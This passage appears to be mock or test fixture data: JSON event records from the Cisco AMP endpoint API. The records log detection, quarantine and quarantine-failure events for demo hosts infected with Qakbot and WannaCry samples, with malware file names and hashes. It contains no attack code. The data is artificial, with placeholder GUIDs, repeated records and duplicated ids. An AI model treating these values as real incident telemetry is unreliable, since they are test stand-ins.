Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
